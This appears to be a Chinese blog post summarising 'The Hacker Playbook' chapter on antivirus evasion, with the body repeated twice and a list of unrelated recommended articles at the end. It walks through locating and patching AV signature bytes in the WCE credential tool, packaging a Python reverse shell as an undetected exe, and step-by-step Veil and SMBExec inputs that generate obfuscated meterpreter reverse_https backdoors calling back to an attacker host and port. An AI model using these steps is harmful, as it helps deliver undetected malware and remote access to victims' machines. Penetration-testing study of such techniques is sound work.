[The Hacker Playbook] 7.THE QUARTERBACK SNEAK-EVADING AV
2016-05-17 14:25
141 查看
1.EVADING AV
1.1 HIDING WCE FROM AV(WINDOWS)
首先下载Evade(https://www.securepla.net/antivirus-now-you-see-me-now-you-dont/),此软件的作用是以指定大小分割文件。例如,一个50K大小的文件,以5K来分割,总共会得到10个文件,前三个文件大小分为为5K,10K,15K,以此类推,最后一个文件大小为50K。
用杀毒软件分别扫描这10个文件,例如当扫到第5个文件时报警,那么就认为杀软的签名命中了第4个文件结束至第5个文件结束位置的字节。接下来可以再次利用Evade对第5个文件进行更细粒度的分割,最终找到特征串。
打开原文件用HxD将特征串修改为其他字母并保存,执行后杀软不再报警。这个例子比较特殊,因为修改的部分没有影响到可行性文件的执行。
1.2 PYTHON
1.2.1 Python Shell
使用python编写回连的shell,并用pyinstalller将其转换为exe文件,用杀软扫描此文件,不报警。
python pyinstaller.py --out=C:\shell\ --noconsole --onefile "C:\shell\shell.py"
1.2.2 Python Keylogger
1.2.3 Veil Example(Kali Linux)
Veil是一种payload生成器,用来绕过杀软工具。
cd /opt/Veil
./Veil.py
下一步选择了MeterHTTPSContained payload
use 20
接下来像在metasploit中一样,配置相应参数
set LHOST 192.168.75.131
set LPORT 443
generate
选择生成payload的方式,这里选择Pyinstaller
1
可执行文件最终保存在/root/veil-output/compiled/folder中
1.2.4 SMBExec(Kali Linux)
SMBExec包含很多不同的功能,这里介绍其从生成一个混淆处理后的meterpreter可执行文件。
cd /opt/smbexec
./smbexec.sh
选择System Access
2
选择创建一个可执行文件,和rc脚本
2
选择windows/meterpreter/reverse_https
2
输入你的本地主机IP和端口号
172.16.139.209
443
执行结束后,会在同目录下生成一个新的文件夹,名称类似于时间戳。在文件夹中会看到backdoor.exe文件,这就是生成的混淆处理后的meterpreter可执行文件。
1.1 HIDING WCE FROM AV(WINDOWS)
首先下载Evade(https://www.securepla.net/antivirus-now-you-see-me-now-you-dont/),此软件的作用是以指定大小分割文件。例如,一个50K大小的文件,以5K来分割,总共会得到10个文件,前三个文件大小分为为5K,10K,15K,以此类推,最后一个文件大小为50K。
用杀毒软件分别扫描这10个文件,例如当扫到第5个文件时报警,那么就认为杀软的签名命中了第4个文件结束至第5个文件结束位置的字节。接下来可以再次利用Evade对第5个文件进行更细粒度的分割,最终找到特征串。
打开原文件用HxD将特征串修改为其他字母并保存,执行后杀软不再报警。这个例子比较特殊,因为修改的部分没有影响到可行性文件的执行。
1.2 PYTHON
1.2.1 Python Shell
使用python编写回连的shell,并用pyinstalller将其转换为exe文件,用杀软扫描此文件,不报警。
python pyinstaller.py --out=C:\shell\ --noconsole --onefile "C:\shell\shell.py"
1.2.2 Python Keylogger
1.2.3 Veil Example(Kali Linux)
Veil是一种payload生成器,用来绕过杀软工具。
cd /opt/Veil
./Veil.py
下一步选择了MeterHTTPSContained payload
use 20
接下来像在metasploit中一样,配置相应参数
set LHOST 192.168.75.131
set LPORT 443
generate
选择生成payload的方式,这里选择Pyinstaller
1
可执行文件最终保存在/root/veil-output/compiled/folder中
1.2.4 SMBExec(Kali Linux)
SMBExec包含很多不同的功能,这里介绍其从生成一个混淆处理后的meterpreter可执行文件。
cd /opt/smbexec
./smbexec.sh
选择System Access
2
选择创建一个可执行文件,和rc脚本
2
选择windows/meterpreter/reverse_https
2
输入你的本地主机IP和端口号
172.16.139.209
443
执行结束后,会在同目录下生成一个新的文件夹,名称类似于时间戳。在文件夹中会看到backdoor.exe文件,这就是生成的混淆处理后的meterpreter可执行文件。
相关文章推荐
- ultraliso制作u盘启动盘
- 【leetcode】9. Palindrome Number
- 代码设置setLayoutParams(lp);总崩溃
- Retina屏实现1px边框
- javafx 同时画line chart和bar chart
- [git]安装git-pylint-commit-hook提高python项目中的代码质量
- jsp基本语法
- ResourceBundle.getBundle("baseName")的使用
- 隐马尔可夫模型(HMM) - 2 - 概率计算方法
- 架构漫谈(二):认识概念是理解架构的基础
- 【Sass-03】Sass官网文档
- android保存图片到本地并可以在相册中显示出来
- Linux top 命令
- 数据库优化
- Combination Sum II
- 自定义viewgroup实现ArcMenu
- NYOJ 1233 差值
- Java获取xml格式字段内容
- Java IO概述
- RxJava入门指引,易懂